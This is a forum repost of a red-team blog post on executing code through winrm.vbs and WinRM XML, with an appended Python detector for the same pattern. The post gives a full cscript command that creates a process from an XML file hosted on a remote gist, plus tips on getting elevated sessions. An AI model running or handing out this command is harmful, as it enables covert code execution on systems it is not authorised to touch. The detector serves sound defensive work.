Nytro, posted February 4, 2019

Matt harr0ey, Feb 2

Introduction

This post gives a simple overview of using Winrm.vbs to execute code from an XML file. I collected a few ideas that can be used for a simple method; since Winrm.vbs is getting more popular with red teams, I found some things that should not wait any longer to be released. Winrm.vbs ==> Windows Remote Management

Synopsis

WinRM is a simple service for running code or instructions on other systems from your own computer over the WS-Management protocol. That remote usage is not what is shown in this blog post; I only give local execution here, but the same thing can happen remotely if you connect to other servers or computers. Further information: https://docs.microsoft.com/en-us/windows/desktop/winrm/about-windows-remote-management

Usage XML/Winrm.vbs

If you are hearing about XML/Winrm.vbs for the first time in this blog post, I would say: yes, this research on winrm.vbs is totally different from any other XML usage, so have a look at Microsoft's description; it gives a good explanation of the instructions Winrm understands. So what is the relationship between normal XML and Winrm XML? The difference is simple: normal XML is easy to understand, but Winrm's XML is not, because Winrm.vbs XML has different elements and different uses from normal XML. Let's look at a picture containing a bit of instruction on Winrm's XML code.

MS-Windows Remote management

Small notes, guys: it's better to run with full privileges (open as administrator), or if you use a platform such as Empire, PowerShell or MSF you can get a higher-level session than a normal one, but don't forget to use Get-TokenPrivs: https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-TokenPrivs.ps1

The graphic in the picture shows some information that is useful for understanding how the XML code is implemented via XML instructions, but be careful: normal XML cannot be used by Winrm.vbs; I think we must use only Winrm's XML language and its version. These instructions show how you can execute XML/Winrm.vbs via Cscript.exe. I also found something else related to the same Winrm.vbs execution, but it doesn't work on my Windows version; it may work on Windows Server 2008 or other versions as well. If you have a VM and Windows Server 2008 you can use this research remotely. This text shows remote execution and the next picture shows local execution:

cscript.exe winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -remote:https://gist.githubusercontent.com/homjxi0e/da3a5f4b5f48d60b156960bf27a4d164/raw/b615f853cf962566a516a320e9324fbfdcb124fc/PoCWinrm.xml

Here you can look forward to another new Winrm blog post, this time on detection (RedCanary). Reference: Lateral Movement Using WinRM and WMI, https://www.redcanary.com/blog/lateral-movement-winrm-wmi/

Source: https://medium.com/@mattharr0ey/round-of-use-winrm-code-execution-xml-6e3219d3e31
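As an added defensive example (not part of the original post or the author's code): a small Python checker that flags process-creation events matching the command line shown above, that is, a script host running winrm.vbs to invoke Win32_Process Create, with -remote pointing at an http(s) URL and certificate checks skipped. The sample events are constructed and the gist URL in them is a placeholder.

```python
"""Flag process-creation events where cscript/wscript runs winrm.vbs to create
a process through WMI, the pattern discussed in this post."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    pid: int
    reasons: list


# Constructed sample events (pid, image path, command line); not real telemetry.
SAMPLE_EVENTS = [
    (4120, r"C:\Windows\System32\cscript.exe",
     "cscript.exe winrm.vbs invoke Create wmicimv2/Win32_Process "
     "-SkipCAcheck -SkipCNcheck -remote:https://gist.example/PLACEHOLDER/PoCWinrm.xml"),
    (4188, r"C:\Windows\System32\cscript.exe",           # benign admin use, not flagged
     r"cscript.exe C:\Windows\System32\winrm.vbs get winrm/config"),
    (4202, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Command Get-Process"),
    (4250, r"C:\Windows\System32\wscript.exe",
     r'WScript.exe "C:\Scripts\backup.vbs"'),
]

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")
WINRM_VBS = re.compile(r"\bwinrm\.vbs\b", re.I)
INVOKE_CREATE = re.compile(r"\binvoke\s+create\b", re.I)
WIN32_PROCESS = re.compile(r"\bwin32_process\b", re.I)
REMOTE_URL = re.compile(r"-remote:(https?://\S+)", re.I)
SKIP_CHECKS = re.compile(r"-skip(ca|cn)check\b", re.I)


def analyze(pid, image, cmdline):
    """Return a Finding for a script host running winrm.vbs with suspicious
    arguments, or None (plain winrm.vbs use such as 'get winrm/config' is ignored)."""
    host = image.rsplit("\\", 1)[-1].lower()
    if host not in SCRIPT_HOSTS or not WINRM_VBS.search(cmdline):
        return None
    reasons = []
    if INVOKE_CREATE.search(cmdline) and WIN32_PROCESS.search(cmdline):
        reasons.append("winrm.vbs invoking Win32_Process Create")
    m = REMOTE_URL.search(cmdline)
    if m:
        reasons.append(f"-remote points at an http(s) URL: {m.group(1)}")
    if SKIP_CHECKS.search(cmdline):
        reasons.append("certificate checks disabled (-SkipCAcheck/-SkipCNcheck)")
    return Finding(pid, reasons) if reasons else None


def scan(events):
    """Run analyze() over (pid, image, cmdline) tuples and keep the hits."""
    return [f for f in (analyze(*e) for e in events) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.pid, "; ".join(f.reasons))
```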